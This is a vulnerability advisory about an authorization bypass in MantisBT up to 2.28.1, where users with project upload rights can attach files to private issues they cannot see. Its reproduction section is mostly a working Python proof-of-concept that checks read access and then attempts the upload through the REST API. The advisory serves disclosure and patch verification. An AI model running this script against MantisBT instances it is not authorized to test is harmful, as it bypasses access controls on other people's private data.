Mantis Bug Tracker Authorization Bypass Vulnerability Allowing Attachment Uploads to Private Issues

Vulnerability

An authorization bypass vulnerability has been identified in Mantis Bug Tracker (MantisBT) versions up to and including 2.28.1. It allows authenticated users to upload attachments to private issues that they are not authorized to view. The cause is the permission check applied when a file is attached to an existing issue: it verifies only that the user holds the project-level upload permission and does not verify that the user is allowed to see the specific issue. As a result, any user with upload rights in a project can attach files to private issues in that project, even though those issues are hidden from them.

Impact

A user with nothing more than project-level upload rights can attach arbitrary files to private issues they cannot otherwise see, and exploitation could lead to unauthorized access to private issue content through the uploaded attachments.

Reproduction

To reproduce this vulnerability, log in as a user with low privileges in the project, such as a reporter, who nevertheless holds the project's upload permission. Create a private issue that this user cannot view, or select an existing one, and verify that access to the issue is denied. Then send a REST API request that uploads an attachment to that private issue, authenticating the request with the low-privileged user's session cookies or API token in the appropriate headers. On an affected version the upload succeeds even though the user is denied access to the issue itself.
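The reproduction steps above, as an added Python example that is not part of this advisory or of the MantisBT project. It first requests the issue (GET /api/rest/issues/{id}) to confirm that the low-privileged user cannot read it, then attempts the upload through the MantisBT REST endpoint for adding files to an existing issue (POST /api/rest/issues/{id}/files, which takes the file content base64-encoded in a JSON body). The host, issue id and token are placeholders to be replaced with your own test instance; the mapping of HTTP status codes to a verdict (403/404 meaning "hidden", 200/201 meaning "accepted") is an assumption about how the server answers and should be confirmed against your instance's responses.

```python
import base64
import json
import urllib.error
import urllib.request

# Hypothetical test instance and credentials (assumptions, replace them).
BASE_URL = "https://mantis.example.test"
PRIVATE_ISSUE_ID = 123
API_TOKEN = "low-privileged-user-api-token"


def _headers(api_token=None, session_cookie=None):
    """Authentication headers: an API token in Authorization, or a reused
    browser session passed as the raw Cookie header value."""
    headers = {"Accept": "application/json"}
    if api_token:
        headers["Authorization"] = api_token
    if session_cookie:
        headers["Cookie"] = session_cookie
    return headers


def build_issue_get(base_url, issue_id, api_token=None, session_cookie=None):
    """GET /api/rest/issues/{id}: used only to confirm the issue is NOT readable."""
    url = f"{base_url.rstrip('/')}/api/rest/issues/{int(issue_id)}"
    return urllib.request.Request(url, headers=_headers(api_token, session_cookie), method="GET")


def build_attachment_post(base_url, issue_id, filename, content, api_token=None, session_cookie=None):
    """POST /api/rest/issues/{id}/files with the file base64-encoded in JSON."""
    body = json.dumps({"files": [{"name": filename,
                                  "content": base64.b64encode(content).decode("ascii")}]}).encode("utf-8")
    headers = _headers(api_token, session_cookie)
    headers["Content-Type"] = "application/json"
    url = f"{base_url.rstrip('/')}/api/rest/issues/{int(issue_id)}/files"
    return urllib.request.Request(url, data=body, headers=headers, method="POST")


def attachment_from_request(req):
    """Decode a prepared upload request back to (filename, raw bytes); handy for review."""
    entry = json.loads(req.data.decode("utf-8"))["files"][0]
    return entry["name"], base64.b64decode(entry["content"])


def send(req, timeout=15):
    """Send a prepared request and return (status, body) even for HTTP error codes."""
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


def classify(get_status, post_status):
    """Interpret the pair of responses (status-code mapping is an assumption):
    'vulnerable'   issue hidden (403/404 on GET) but the upload was accepted (200/201)
    'fixed'        issue hidden and the upload was refused (403/404)
    'inconclusive' the user could read the issue, or an unrelated error (401, 5xx, ...)"""
    if get_status not in (403, 404):
        return "inconclusive"
    if post_status in (200, 201):
        return "vulnerable"
    if post_status in (403, 404):
        return "fixed"
    return "inconclusive"


def check_private_upload(base_url, issue_id, api_token=None, session_cookie=None):
    """Run the reproduction: prove no read access first, then try the upload."""
    get_status, _ = send(build_issue_get(base_url, issue_id, api_token, session_cookie))
    if get_status not in (403, 404):
        return "inconclusive", get_status, None
    payload = b"MantisBT private-issue upload check\n"  # constructed, harmless test file
    post_status, _ = send(build_attachment_post(base_url, issue_id, "poc.txt", payload,
                                                api_token, session_cookie))
    return classify(get_status, post_status), get_status, post_status


if __name__ == "__main__":
    verdict, g, p = check_private_upload(BASE_URL, PRIVATE_ISSUE_ID, api_token=API_TOKEN)
    print(f"GET issue -> {g}, POST attachment -> {p}: {verdict}")
```

Run it only against an instance you are authorized to test. The GET step matters: if the low-privileged user can already read the issue, a successful upload proves nothing about the visibility check, which is why the script reports that case as inconclusive rather than vulnerable.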

Remediation

Users should upgrade to MantisBT version 2.28.2, where this vulnerability has been fixed.

Added: May 20, 2026, 12:21 AM
Updated: May 20, 2026, 12:21 AM

Vulnerability Rating

Custom Algorithm
spread: 5.0
impact: 0.6
exploitability: 6.2
remediation: 7.7
relevance: 8.9
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.